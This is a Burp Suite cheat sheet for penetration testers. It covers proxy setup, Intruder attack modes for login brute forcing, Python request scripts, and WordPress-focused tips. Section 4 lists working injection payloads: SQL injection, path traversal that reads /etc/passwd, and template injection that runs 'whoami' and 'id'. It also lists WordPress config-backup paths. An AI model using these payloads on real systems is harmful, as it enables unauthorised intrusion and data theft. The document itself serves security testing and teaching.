Burp Suite Cheat Sheet for Penetration Testing

2. Proxy Usage

Basic Configuration

1. Configure proxy listener:
   • Proxy > Proxy Settings > Add
   • Binding: 127.0.0.1:8080 (default)
   • Enable “Running” checkbox
2. Configure browser proxy settings:
   • HTTP proxy: 127.0.0.1
   • Port: 8080
   • Or install “FoxyProxy” extension
3. Install Burp CA certificate in browser:
   • Navigate to http://burp
   • Download CA certificate
   • Import into browser’s trusted certificates

Intercepting Requests

1. Enable interception: Proxy > Intercept > “Intercept is on”
2. Actions with intercepted requests:
   • Modify headers, parameters, or body content
   • Forward: Send request to server
   • Drop: Discard request
   • Action > Send to other Burp tools

Request History

• View all requests in Proxy > HTTP History
• Filter requests by domain, file type, status code, etc.
• Right-click to send to other Burp tools

Match and Replace

• Proxy > Options > Match and Replace
• Automatically modify requests/responses based on regex patterns

3. Intruder Attack Types

Sniper

• Tests each position individually with payloads
• Positions: 3, Payloads: 10 = 30 requests
• Best for: Testing single vulnerabilities across multiple positions

POST /login HTTP/1.1
Host: example.com

username=§admin§&password=§password§

Battering Ram

• Uses same payload in all defined positions simultaneously
• Positions: 3, Payloads: 10 = 10 requests
• Best for: Testing when same input is needed in multiple fields

POST /login HTTP/1.1
Host: example.com

username=§admin§&password=§admin§

Pitchfork

• Uses different payload sets for different positions
• Each position gets its corresponding payload
• Positions: 3, Payloads per set: 10 = 10 requests
• Best for: Testing with related data (username+password pairs)

POST /login HTTP/1.1
Host: example.com

username=§username§&password=§password§

Cluster Bomb

• Tests all combinations of payloads
• Positions: 3, Payloads per set: 10 = 1,000 requests
• Best for: Brute force attacks (username + password combinations)

POST /login HTTP/1.1
Host: example.com

username=§username§&password=§password§

4. Common Payloads for Attacks

' OR 1=1 --
' OR '1'='1
' UNION SELECT 1,2,3 --
' UNION SELECT table_name,2,3 FROM information_schema.tables --
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users' --
' AND (SELECT 5151 FROM (SELECT(SLEEP(5)))tImc) --
' AND extractvalue(rand(),concat(0x7e,(SELECT version()),0x7e)) --

../../../etc/passwd
....//....//....//etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
/proc/self/environ
/var/log/apache2/access.log
php://filter/convert.base64-encode/resource=/etc/passwd

${7*7}
{{7*7}}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
${T(java.lang.Runtime).getRuntime().exec('whoami')}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

/wp-login.php
/wp-admin
/wp-content/uploads/
/wp-content/plugins/
/wp-config.php.bak
/wp-config.php~
/?author=1

# Path discovery
/admin
/backup
/config
/dev
/.git/HEAD

# File extensions
.bak
.old
.swp
.txt
.zip
.tar.gz

# WordPress files
wp-config.php
wp-content/debug.log
wp-content/uploads/

5. Repeater & Decoder Usage

Repeater

• Send intercepted requests to Repeater: Right-click > Send to Repeater
• Modify request and click “Send” to resend
• View side-by-side request and response
• Use multiple tabs for comparing responses
• Right-click > Change request method (GET/POST)

Decoder

1. Select text and right-click > Send to Decoder (or Ctrl+Shift+D)
2. Encoding options:
   • URL: Convert special characters to %XX format
   • HTML: Convert characters to HTML entities
   • Base64: Encode/decode as Base64
   • ASCII Hex: Convert to/from hexadecimal
   • Hex: Raw binary data as hexadecimal
   • Gzip: Compress/decompress using gzip
   • Deflate: Compress/decompress using deflate
3. Chained encoding/decoding:
   • “Encode as…” applies the encoding
   • “Decode as…” attempts to decode
   • Multiple encodings can be applied sequentially

6. Automating with Burp Suite API

Python Script for Sending Requests Through Burp Proxy

import requests

# Burp Proxy settings
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

# Custom headers
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}

# Disable SSL verification (often needed with Burp)
requests.packages.urllib3.disable_warnings()

# GET request through Burp
def send_get(url):
    response = requests.get(
        url,
        proxies=proxies,
        headers=headers,
        verify=False  # Disable SSL verification
    )
    return response

# POST request through Burp
def send_post(url, data):
    response = requests.post(
        url,
        data=data,
        proxies=proxies,
        headers=headers,
        verify=False  # Disable SSL verification
    )
    return response

# Example usage
target = "https://example.com/login"
login_data = {
    "username": "admin",
    "password": "password123"
}

response = send_post(target, login_data)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

Using Burp REST API (Professional)

import requests
import json

# Burp Enterprise API settings
api_url = "http://localhost:1337/api/scan"
api_key = "your_api_key_here"

headers = {
    "Content-Type": "application/json",
    "Authorization": f"Bearer {api_key}"
}

# Create a new scan
def create_scan(target_url):
    payload = {
        "scan_configurations": [
            {"type": "NamedConfiguration", "name": "Default"}
        ],
        "urls": [target_url]
    }
    
    response = requests.post(
        api_url,
        headers=headers,
        data=json.dumps(payload)
    )
    
    return response.json()

# Get scan status
def get_scan_status(scan_id):
    response = requests.get(
        f"{api_url}/{scan_id}",
        headers=headers
    )
    
    return response.json()

# Example usage
new_scan = create_scan("https://example.com")
scan_id = new_scan["id"]
print(f"Created scan with ID: {scan_id}")

status = get_scan_status(scan_id)
print(f"Scan status: {status['scan_status']}")

7. Popular Burp Extensions

Essential Extensions

Installing Extensions

1. Extender > BApp Store
2. Browse or search for extensions
3. Click “Install” button
4. View loaded extensions under Extender > Extensions

WordPress-Specific Extensions

• WP Plugin Scanner: Enumerates and tests WordPress plugins
• WP Scanner Integration: Integrates WPScan results
• CMS Scanner: Detects WordPress and plugin versions

8. Tips for Optimizing Burp Suite Performance

Memory Management

• Increase Java heap size:
  • Burp > Project options > Misc > Java Environment
  • Maximum memory allocation: 2048 MB (adjust based on RAM)

Speed Optimization

• Use target scope to limit requests:
  • Target > Scope > Include in scope
  • Project options > Scope > URL Scope
• Enable “Use smart scan settings” in Scanner
• Disable logging for file types:
  • Proxy > Options > Intercept Client Requests
  • Disable for: \.jpg$|\.gif$|\.png$|\.css$|\.js$

Efficient Workflows

• Use Burp project files to save/restore state
• Create and use saved scan configurations
• Use match/replace rules for repetitive changes
• Create macros for multi-step authentication

Resource Saving

• Disable passive scanning if not needed
• Configure response interception strategically
• Set up strict scoping for large applications
• Use Intruder’s “Number of threads” wisely (20-50 is often optimal)

WordPress-Specific Optimizations

• Add WordPress admin paths to scope
• Create scan profiles specific to WordPress vulnerabilities
• Use match/replace rules to add WordPress authentication cookies automatically